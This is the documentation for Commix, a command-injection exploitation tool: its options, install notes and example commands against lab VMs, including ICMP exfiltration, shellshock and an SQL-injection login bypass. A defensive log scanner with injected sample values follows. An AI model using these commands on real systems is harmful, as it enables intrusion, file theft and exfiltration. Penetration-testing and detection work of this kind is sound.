Commix - Automated Command Injection and Exploitation Tool

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool for testing web-based applications for bugs, errors or vulnerabilities related to command injection attacks. With it, finding and exploiting a command injection vulnerability in a given vulnerable parameter or HTTP header is very easy.


  • Python 2.6.x or 2.7.x
  • Linux/ Mac OS X/ Windows (experimental)


Download commix by cloning the Git repository:
git clone commix
Commix comes packaged in the official repositories of the following Linux distributions, so you can use the package manager to install it:

Commix is also available as a plugin for the following penetration testing frameworks:
  • TrustedSec's Penetration Testers Framework (PTF)
  • OWASP Offensive Web Testing Framework (OWTF)
  • CTF-Tools
  • PentestBox
  • PenBox
  • Katoolin
  • Aptive's Penetration Testing tools
  • Homebrew Tap - Pen Test Tools


  python [option(s)]

  -h, --help            Show help and exit.

    These options relate to general matters.

    -v VERBOSE          Verbosity level (0-4, Default: 0).

    --install           Install 'commix' to your system.

    --version           Show version number and exit.

    --update            Check for updates (apply if any) and exit.

    --output-dir=OUT..  Set custom output directory path.

    -s SESSION_FILE     Load session from a stored (.sqlite) file.

    --flush-session     Flush session files for current target.

    --ignore-session    Ignore results stored in session file.

    -t TRAFFIC_FILE     Log all HTTP traffic into a textual file.

    --batch             Never ask for user input, use the default behaviour.

    --charset=CHARSET   Force character encoding used for data retrieval.

    --check-internet    Check internet connection before assessing the target.

    This options has to be provided, to define the target URL.

    -u URL, --url=URL   Target URL.

    --url-reload        Reload target URL after command execution.

    -l LOGFILE          Parse target from HTTP proxy log file.

    -m BULKFILE         Scan multiple targets given in a textual file.

    -r REQUESTFILE      Load HTTP request from a file.

    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL (1-2,
                        Default: 0).

    -x SITEMAP_URL      Parse target(s) from remote sitemap(.xml) file.

    These options can be used to specify how to connect to the target URL.

    -d DATA, --data=..  Data string to be sent through POST.

    --host=HOST         HTTP Host header.

    --referer=REFERER   HTTP Referer header.

    --user-agent=AGENT  HTTP User-Agent header.

    --random-agent      Use a randomly selected HTTP User-Agent header.

    --param-del=PDEL    Set character for splitting parameter values.

    --cookie=COOKIE     HTTP Cookie header.

    --cookie-del=CDEL   Set character for splitting cookie values.

    -H HEADER, --hea..  Extra header (e.g. 'X-Forwarded-For:').

    --headers=HEADERS   Extra headers (e.g. 'Accept-Language: fr\nETag: 123').

    --proxy=PROXY       Use a HTTP proxy (e.g. '').

    --tor               Use the Tor network.

    --tor-port=TOR_P..  Set Tor proxy port (Default: 8118).

    --tor-check         Check to see if Tor is used properly.

    --auth-url=AUTH_..  Login panel URL.

    --auth-data=AUTH..  Login parameters and data.

    --auth-type=AUTH..  HTTP authentication type (e.g. 'Basic' or 'Digest').

    --auth-cred=AUTH..  HTTP authentication credentials (e.g. 'admin:admin').

    --ignore-401        Ignore HTTP error 401 (Unauthorized).

    --force-ssl         Force usage of SSL/HTTPS.

    --ignore-redirects  Ignore redirection attempts.

    --retries=RETRIES   Retries when the connection timeouts (Default: 3).

    These options can be used to enumerate the target host.

    --all               Retrieve everything.

    --current-user      Retrieve current user name.

    --hostname          Retrieve current hostname.

    --is-root           Check if the current user have root privileges.

    --is-admin          Check if the current user have admin privileges.

    --sys-info          Retrieve system information.

    --users             Retrieve system users.

    --passwords         Retrieve system users password hashes.

    --privileges        Retrieve system users privileges.

    --ps-version        Retrieve PowerShell's version number.

  File access:
    These options can be used to access files on the target host.

    --file-read=FILE..  Read a file from the target host.

    --file-write=FIL..  Write to a file on the target host.

    --file-upload=FI..  Upload a file on the target host.

    --file-dest=FILE..  Host's absolute filepath to write and/or upload to.

    These options can be used increase the detection and/or injection


    --icmp-exfil=IP_..  The 'ICMP exfiltration' injection module.
                        (e.g. 'ip_src=,ip_dst=').

    --dns-server=DNS..  The 'DNS exfiltration' injection module.
                        (Domain name used for DNS exfiltration attack).

    --shellshock        The 'shellshock' injection module.

    These options can be used to specify which parameters to inject and to

    provide custom injection payloads.

    -p TEST_PARAMETER   Testable parameter(s).

    --skip=SKIP_PARA..  Skip testing for given parameter(s).

    --suffix=SUFFIX     Injection payload suffix string.

    --prefix=PREFIX     Injection payload prefix string.

    --technique=TECH    Specify injection technique(s) to use.

    --skip-technique..  Specify injection technique(s) to skip.

    --maxlen=MAXLEN     Set the max length of output for time-related
                        injection techniques (Default: 10000 chars).

    --delay=DELAY       Seconds to delay between each HTTP request.

    --time-sec=TIMESEC  Seconds to delay the OS response (Default 1).

    --tmp-path=TMP_P..  Set the absolute path of web server's temp directory.

    --web-root=WEB_R..  Set the web server document root directory (e.g.


    --alter-shell=AL..  Use an alternative os-shell (e.g. 'Python').

    --os-cmd=OS_CMD     Execute a single operating system command.

    --os=OS             Force back-end operating system (e.g. 'Windows' or


    --tamper=TAMPER     Use given script(s) for tampering injection data.

    --msf-path=MSF_P..  Set a local path where metasploit is installed.

    --backticks         Use backticks instead of "$()", for commands


    These options can be used to customize the detection phase.

    --level=LEVEL       Level of tests to perform (1-3, Default: 1).

    --skip-calc         Skip the mathematic calculation during the detection


    --skip-empty        Skip testing the parameter(s) with empty value(s).

    --failed-tries=F..  Set a number of failed injection tries, in file-based


    --dependencies      Check for third-party (non-core) dependencies.

    --purge-output      Safely remove all content from output directory.

    --skip-waf          Skip heuristic detection of WAF/IPS/IDS protection.

    --mobile            Imitate smartphone through HTTP User-Agent header.

    --offline           Work in offline mode.

    --wizard            Simple wizard interface for beginner users.

    --disable-coloring  Disable console output coloring.


root@kali:~/commix# python --url="
vulnerabilities/exec/#" --data="ip=" --cookie="security
=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
  • Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python --url="
wizard/index.php?type=test" --prefix="'" --suffix="//"
root@kali:~/commix# python --url="
index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=" --headers="Accept-Language:fr\nETag:123\n" --proxy=""
  • Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python --url="" 
--data="addr=" --icmp-exfil="ip_src=,ip_dst="
  • Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python --url=""
--data="addr=" --alter-shell="Python"
root@kali:~/commix# python --url="" 
--data="ip=" --auth-url="
index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
root@kali:~/commix# python --url="
drawimage.php?pfilez=" --user-agent="Mozilla/4.0 Mozilla4_browser"
--technique="f" --root-dir="/"
root@kali:~/commix# python --url="" 
root@kali:~/commix# python --url="
scenarios/cookie/cookie(blind).php" --cookie="addr="
root@kali:~/commix# python --url="
scenarios/user-agent/ua(blind).php" --level=3
root@kali:~/commix# python --url="
scenarios/referer/referer(classic).php" --level=3
  • Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python --url="*" 
--headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
root@kali:~/commix# python --url="
scenarios/regular/POST/classic_json.php" --data='{"addr":"","name":"ancst"}'
  • Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python --url="" 
--shellshock --proxy=""
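
A defender-side counterpart to the usage examples above, added here and not part of commix or the original post: a Python scanner for web access logs in Combined Log Format that flags shell metacharacters in query parameters and in the Referer and User-Agent headers, plus the Shellshock `() {` prefix. The log lines, paths and parameter names are constructed for illustration; POST bodies and cookies do not appear in this log format and would need WAF or application logging.

```python
import re
from urllib.parse import unquote

# Combined Log Format: request line, status, size, Referer, User-Agent.
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Parameter values: any command separator or substitution is suspicious.
PARAM_META = re.compile(r"[;|`\n]|&&|\$\(")
# Headers: ';' is normal in a User-Agent, so flag only |, `, &&, $( and '() {'.
HEADER_META = re.compile(r"[|`]|&&|\$\(|\(\)\s*\{")


def decode(value, rounds=2):
    """URL-decode `rounds` times so double-encoded input is seen too."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def scan_line(line):
    """Return (field, decoded_value) findings for one access-log line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    findings = []
    query = m.group("target").partition("?")[2]
    for pair in filter(None, query.split("&")):
        name, _, raw = pair.partition("=")
        value = decode(raw)
        if PARAM_META.search(value):
            findings.append(("param:" + name, value))
    for field in ("referer", "agent"):
        value = decode(m.group(field))
        if HEADER_META.search(value):
            findings.append((field, value))
    return findings


STAMP = '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] '
SAMPLES = [  # constructed lines, not taken from a real server
    STAMP + '"GET /index.php?page=dns-lookup.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    STAMP + '"GET /ping.php?ip=127.0.0.1%253Bid HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    STAMP + '"GET /ua.php HTTP/1.1" 200 64 "() { :; }; echo probe" "Mozilla/4.0 $(id)"',
]
if __name__ == "__main__":
    for line in SAMPLES:
        print(scan_line(line) or "clean")
```

The header pattern is deliberately narrower than the parameter pattern, so an ordinary User-Agent such as the first sample does not raise a finding.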
